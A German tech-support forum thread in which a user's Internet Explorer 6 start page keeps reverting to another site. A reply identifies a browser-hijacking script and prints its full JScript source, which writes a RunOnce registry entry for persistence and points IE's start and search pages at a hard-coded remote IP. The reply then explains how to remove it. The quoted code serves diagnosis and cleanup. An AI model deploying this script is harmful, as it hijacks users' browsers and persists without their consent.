Startzeite im IE?


  • themumie
  • 716 Aufrufe 5 Antworten

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Startzeite im IE?

    Tach Leutz!
    Hab nen problem mit Internet Explorer 6.0!
    also normalerweise is meine startzeite das fsb aber plötzlich google.com aber wenn ich das ändern möchte stellt er das einfach wieder automatisch züruck auf google.com?

    hab versucht die cookies zu löschen hat aber nix gebracht!

    was soll ich machen?

    GreeTz ThEmUmIe
  • Habe mal gegoogelt

    es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird sobald Du dich abmeldest bzw. den Computer neu startest. Suche einfach mal auf C: nach *.js und öffne mit Wordpad, die Dateien die unter c:\windows + Unterordner oder c:\programme + Unterordner zu finden sind. Ausnahmen:

    c:\windows\system32\oobe
    c:\windows\help\tours
    c:\programme\real\realone player

    Also die Skripst in diesen Ordnern brauchst Du eigentlich nicht öffnen. Bei mir war die Datei update911.js, die unter c:windows zu finden war. Sie sah so aus:

    var url = "http://81.211.105.8/index.php?v=1";
    var burl = "http://81.211.105.8/search.php?v=1";
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var tfolder = fso.GetSpecialFolder(0);
    var filepath = tfolder + "\\update911.js";
    var Shell = new ActiveXObject("WScript.Shell");
    Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

    Sobald Du die Datei gefunden hast (muss nicht update911.js sein), einfach mal im Regedit den Eintrag löschen (und natürlich auch die Datei auf Deiner Festplatte).

    ein nützliches Programm findest Du unter mjc1.com/mirror/hjt/. Das Programm zeigt alles, was mit Windows über die Registrierung (Regedit)gestartet wird. Einfach Programm starten --> Scann --> die entsprechenden Einträge markieren und --> Fix Cheched und sie zu löschen. Geht wesentlich schneller als mit Regedit zu suchen